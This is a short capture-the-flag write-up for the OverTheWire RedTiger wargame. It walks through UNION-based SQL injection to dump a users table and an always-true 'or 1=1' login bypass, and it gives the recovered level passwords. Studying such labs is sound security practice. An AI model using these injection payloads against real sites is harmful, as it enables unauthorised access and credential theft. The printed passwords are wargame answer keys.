Cover Image

OverTheWire RedTiger

 April 21, 2021    OverTheWire

RedTiger 1

  • Target: Get the login for the user Hornoxe
  • Hint: You really need one? omg -_-
  • Tablename: level1_users
  • If we click on the Category its adds a ?cat=1 to the URL.
  • Let's try adding ?cat=1 and 1 and 1=1# which gives as the same result, a ?cat=1 and 1 and 1=2# on the other hand generates an error.
  • We can find out how many columns the table has with ?cat=1 order by 5#, since 5 gives us an error and 4 not, there are 4 columns, 3 and 4 can be used to display outputs ?cat=1 union select 1,2,3,4 from level1_users#
  • Let's get the password ?cat=1 union select 1,2,username,password from level1_users #
  • The user is Hornoxe and the password thatwaseasy
  • The password is passwords_will_change_over_time_let_us_do_a_shitty_rhyme


RedTiger 2

  • Target: Login
  • Hint: Condition
  • We can try to use an always-true-condition for the username and password 1' or 1=1 #
  • The password is feed_the_cat_who_eats_your_bread